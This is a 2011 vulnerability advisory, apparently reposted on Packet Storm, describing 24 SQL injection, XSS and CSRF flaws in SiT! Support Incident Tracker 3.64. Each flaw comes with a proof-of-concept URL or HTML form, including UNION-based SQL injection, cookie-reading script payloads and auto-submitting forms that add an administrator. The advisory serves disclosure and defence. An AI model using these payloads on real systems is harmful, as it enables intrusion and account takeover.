what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SiT! Support Incident Tracker 3.64 XSS / XSRF / SQL Injection

SiT! Support Incident Tracker 3.64 XSS / XSRF / SQL Injection
Posted Sep 14, 2011
Authored by High-Tech Bridge SA | Site htbridge.com

SiT! Support Incident Tracker version 3.64 suffers from cross site request forgery, cross site scripting, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection, csrf
SHA-256 | f96224a116d5b9a0cf199fe7824da18754178ae86a55d1412935c259aa11d26e

SiT! Support Incident Tracker 3.64 XSS / XSRF / SQL Injection

Change Mirror Download
Vulnerability ID: HTB23043
Reference: https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_sit_support_incident_tracker.html
Product: SiT! Support Incident Tracker
Vendor: The Support Incident Tracker Project ( http://sitracker.org/ )
Vulnerable Version: 3.64 and probably prior
Tested Version: 3.64
Vendor Notification: 24 August 2011
Vulnerability Type: SQL Injection, XSS, CSRF
Status: Fixed by Vendor
Risk level: High
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )

Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in SiT! Support Incident Tracker, which can be exploited to perform SQL injection, cross-site scripting, cross-site request forgery attacks.

1) Input passed via the "start" GET parameter to /portal/kb.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC code is available:

http://[host]/portal/kb.php?start=SQL_CODE_HERE

2) Input passed via the "contractid" GET parameter to contract_add_service.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC code is available:

http://[host]/contract_add_service.php?contractid=1%20union%20%28select%20min%28@a:=1%29from%20%28select%201%20union%20select%202%29k%20group%20by%20%28select%20concat%28@@version,0x0,@a:=%28@a%2B1%29%2%29%29%29%20+--+

3) Input passed via the "mode" GET parameter to contact_support.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.

The following PoC code is available:

http://[host]/contact_support.php?mode=1%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

4) Input passed via the "contractid" GET parameter to contract_add_service.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.

The following PoC code is available:

http://[host]/contract_add_service.php?contractid=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

5) Input passed via the "user" GET parameter to edit_backup_users.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.

The following PoC code is available:

http://[host]/edit_backup_users.php?user=%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

6) Input passed via the "id" GET parameter to edit_escalation_path.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC code is available:

http://[host]/edit_escalation_path.php?id=-1%20union%20select%201,version%28%29,user%28%29,4,5,6,7,8,9

7) Input passed via the "id" GET parameter to edit_escalation_path.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.

The following PoC code is available:

http://[host]/edit_escalation_path.php?id=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

8) Input passed via the Referer parameter to forgotpwd.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.

The following PoC code is available:

GET /forgotpwd.php?userid=1&action=sendpwd HTTP/1.1
Referer: '<script>alert(document.cookie);</script>

9) Input passed via the "unlock" & "lock" GET parameters to holding_queue.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC code is available:

http://[host]/holding_queue.php?unlock=%27SQL_CODE_HERE
http://[host]/holding_queue.php?lock=%27SQL_CODE_HERE

10) Input passed via the "selected" POST parameter to holding_queue.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC code is available:

<form action="http://[host]/holding_queue.php" method="post">
<input type="hidden" name="selected[]" value="'SQL_CODE_HERE">
<input type="submit" value="exploit">
</form>

11) Input passed via the "action" GET parameter to inbox.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.

The following PoC code is available:

http://[host]/inbox.php?action=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

12) Input passed via the "search_string" GET parameter to incident_add.php (when "action" is set to "findcontact") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.

The following PoC code is available:

http://[host]/incident_add.php?action=findcontact&search_string=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

13) Input passed via the "inc" POST parameter to report_customers.php (when "mode" is set to "report") is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC code is available:

<form action="http://[host]/report_customers.php?mode=report" method="post">
<input type="hidden" name="inc[]" value="-1) union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 -- ">
<input type="hidden" name="output" value="screen">
<input type="submit" value="exploit">
</form>

14) Input passed via the "table1" POST parameter to report_customers.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.

The following PoC code is available:

<form action="http://[host]/report_customers.php" method="post">
<input type="hidden" name="table1" value="'><script>alert(document.cookie);</script>">
<input type="submit" value="exploit">
</form>

15) Input passed via the "table1" POST parameter to report_incidents_by_engineer.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.

The following PoC code is available:

<form action="http://[host]/report_incidents_by_engineer.php" method="post">
<input type="hidden" name="table1" value="'><script>alert(document.cookie);</script>">
<input type="submit" value="exploit">
</form>

16) Input passed via the "table1" POST parameter to report_incidents_by_site.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.

The following PoC code is available:

<form action="http://[host]/report_incidents_by_site.php" method="post">
<input type="hidden" name="table1" value="'><script>alert(document.cookie);</script>">
<input type="submit" value="exploit">
</form>

17) Input passed via the "inc" POST parameter to report_incidents_by_site.php (when "mode" is set to "report") is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC code is available:

<form action="http://[host]/report_incidents_by_site.php?mode=report" method="post">
<input type="hidden" name="inc[]" value="-1) union select version(),2,3,4,5,6,7,8,9,10 -- ">
<input type="hidden" name="output" value="screen">
<input type="submit" value="exploit">
</form>

18) Input passed via the "startdate" & "enddate" GET parameters to report_incidents_by_vendor.php (when "mode" not empty) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.

The following PoC code is available:

http://[host]/report_incidents_by_vendor.php?mode=1&startdate=%3Cscript%3Ealert%281%29;%3C/script%3E&enddate=%3Cscript%3Ealert%282%29;%3C/script%3E

19) Input passed via the "table1" POST parameter to report_marketing.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.

The following PoC code is available:

<form action="http://[host]/report_marketing.php" method="post">
<input type="hidden" name="table1" value="'><script>alert(document.cookie);</script>">
<input type="submit" value="exploit">
</form>

20) Input passed via the "start" GET parameter to search.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC code is available:

http://[host]/search.php?q=123&domain=incidents&start=SQL_CODE_HERE

21) Input passed via the "sites" GET parameter to transactions.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC code is available:

http://[host]/transactions.php?sites[]=1%20union%20select%201,2,3,4,5,6,7,8,version%28%29,10,11,12,13,14,15,16%20+--+

22) Input passed via the Referer parameter to billable_incidents.php (when "mode" is set to "approvalpage" & "output" is set to "html") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.

The following PoC code is available:

GET /billable_incidents.php?mode=approvalpage&output=html HTTP/1.1
Referer: '><script>alert(document.cookie);</script>

23) Input passed via the Referer parameter to transactions.php (when "display" is set to "html") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.

The following PoC code is available:

GET /transactions.php?display=html HTTP/1.1
Referer: '><script>alert(document.cookie);</script>

24) The application allows users to perform certain actions via HTTP requests without making proper validity checks to verify the requests.
This can be exploited to e.g. change administrator email, add new new administrator or conduct script insertion attacks by tricking an administrator into visiting a malicious web site while being logged-in to the application.

The following PoC is available:

<form action="http://[host]/user_profile_edit.php" method="post">
<input type="hidden" name="realname" value="realname">
<input type="hidden" name="mode" value="save">
<input type="hidden" name="submit" value="Save">
<input type="hidden" name="email" value="testemail@test.com">
<input type="hidden" name="userid" value="1">
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>


<form action="http://[host]/user_add.php" method="post">
<input type="hidden" name="realname" value="testuser">
<input type="hidden" name="username" value="testuser">
<input type="hidden" name="password" value="password">
<input type="hidden" name="groupid" value="0">
<input type="hidden" name="roleid" value="1">
<input type="hidden" name="jobtitle" value="jobtitle">
<input type="hidden" name="email" value="email@email.com">
<input type="hidden" name="submit" value="Add User">
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>

--------------------------------

Solution: Upgrade to the most recent version
Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close